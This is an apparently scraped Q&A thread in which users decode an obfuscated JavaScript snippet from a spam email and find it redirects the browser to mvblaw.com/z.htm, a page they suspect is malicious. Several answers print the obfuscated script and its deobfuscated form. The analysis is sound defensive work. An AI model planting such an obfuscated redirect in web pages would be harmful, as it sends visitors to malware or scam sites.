ansaurus

Question

Answer 1

+5 A:

Answer:

The script executes

document.location.href = "http://mvblaw.com/z.htm";    //Evil site (I assume)

It also contains a large number of useless lines to hide the script's true purpose.

Analysis

Here it is unpacked.

function mD() {};
this.aB = 43719;
mD.prototype = {
    i: function () {
        var w = new Date();
        this.j = '';
        var x = function () {};
        var a = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
        var d = new Date();
        y = "";
        aL = "";
        var f = document;
        var s = function () {};
        this.yE = "";
        aN = "";
        var dL = '';
        var iD = f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
        this.v = "v";
        var q = 27427;
        var m = new Date();
        iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
        dE = '';
        k = "";
        var qY = function () {};
    }
};
xO = false;
var b = new mD();
yY = "";
b.i();
this.xT = '';

Cleaning up the obfuscations and adding meaningful names, it becomes

function TempClass() {};
this.aB = 43719;
TempClass.prototype = {
    doIt: function () {
        var w = new Date();
        this.j = '';
        var x = function () {};
        var a = "http://mvblaw.com/z.htm";    //Evil site (I assume)

        var d = new Date();
        y = "";
        aL = "";
        var f = document;
        var s = function () {};
        this.yE = "";
        aN = "";
        var dL = '';
        var iD = f['location'];
        this.v = "v";
        var q = 27427;
        var m = new Date();
        iD['href'] = a;
        dE = '';
        k = "";
        var qY = function () {};
    }
};
xO = false;
var b = new TempClass();
yY = "";
b.doIt();
this.xT = '';

Removing all of the useless lines, it becomes

function TempClass() {};

TempClass.prototype = {
    doIt: function () {
        var a = "http://mvblaw.com/z.htm";    //Evil site (I assume)

        var f = document;
        var iD = f['location'];
        iD['href'] = a;
    }
};

var b = new TempClass();
b.doIt();

SLaks 2010-06-11 01:22:05

http:// mvblaw . com/z.htm after regexp. All it seems to do is redirect to that address.

Glenn 2010-06-11 01:26:15

The link is now down (standard Apache 404); you don't need to worry about it.

SLaks 2010-06-11 01:28:03

So you don't think this targets specifically our website then? It's just a generic email and they use our name?

nute 2010-06-11 01:29:54

Is this better?

Glenn 2010-06-11 01:30:21

SLaks, the link for the second script is live. And it looks bad.

nute 2010-06-11 01:30:24

It's trying to redirect the user to http://mvblaw.com/z.htm. In line 8, that string looks like a bunch of jibberish, but the replace method that follows strips out the characters in the regular expressions, leaving http://mvblaw.com/z.htm. They do the same thing later to set the location.href value of the browser window, redirecting the user to that z.htm page that probably had malware or something else evil happening on it.

wmid 2010-06-11 01:31:44

Glenn - if you mean, is it better that it's just a random email, yes: I was afraid it was script designed to make our users do things on our website, that would then lead to the script affecting other people visiting our site ...

nute 2010-06-11 01:34:16

@nute: The second link redirects to a different site, which sends no content.

SLaks 2010-06-11 01:34:43

well, you can `view-source:http://mvblaw.com/z.htm` in google chrome to see what's the codes inside...

Reigel 2010-06-11 01:37:32

Answer 2

+3 A:

No geniuses, they:

hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');

h t t p : / / m v b l a w . c o m / z . h t m


f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];

   l o c a t i o n

iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;

    h r e f

Didn't even need to run it through regex :)

I'm going to assume they hacked mvblaw and snuck the payload page on there. Anyone with a VM want to see what it does?

egrunin 2010-06-11 01:24:42

it seems the second script sends to lendermedia . com/images/z.htm, which is a canadian pharmacy, and it tried to load some java code too.

nute 2010-06-11 01:29:23

Answer 3

A:

It may be related to this StackOverflow question

If you Google the script in question, don't follow the links, they triggered my anti-virus

LittleBobbyTables 2010-06-11 01:26:03

Yes, that's the same one. Great nym, btw :)

egrunin 2010-06-11 01:34:03

yeah! great name!... :D

Reigel 2010-06-11 01:40:17

Answer 4

A:

Basically, it appears to set (document['location'])['href'] (or, in regular speak, document.location.href) to http://mvblaw.com/z.htm.

The obfuscation code is pretty simple, just replacing the noise characters with nothing:

var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
    // a = http://mvblaw.com/z.htm
var f=document;
var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
    // iD = document.location
iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
    // document.location.href = a (the URL above).

paxdiablo 2010-06-11 01:28:27

Answer 5

+3 A:

The script has a lot of useless stuff just to create confusion, the essential parts of the script are:

function mD() {};
mD.prototype = {
  i: function () {
     // read between every two letters:
     var a = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'
              .replace(/[gJG,\<]/g, '');
     var f = document;
     var iD = f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
     iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
   }
};
var b = new mD();
b.i();

If we clean up more:

function mD() {};
mD.prototype = {
  i: function () {
     var a = 'http://mvblaw.com/z.htm';
     var f = document;
     var iD = f['location'];
     iD['href'] = a;
   }
};
var b = new mD();
b.i();

And more:

function mD() {};
mD.prototype = {
  i: function () {
     document.location.href = 'http://mvblaw.com/z.htm';
   }
};
var b = new mD();
b.i();

CMS 2010-06-11 01:31:25

ansaurus

tags:

views:

answers:

What does this Javascript do?

Answer:

Analysis

related questions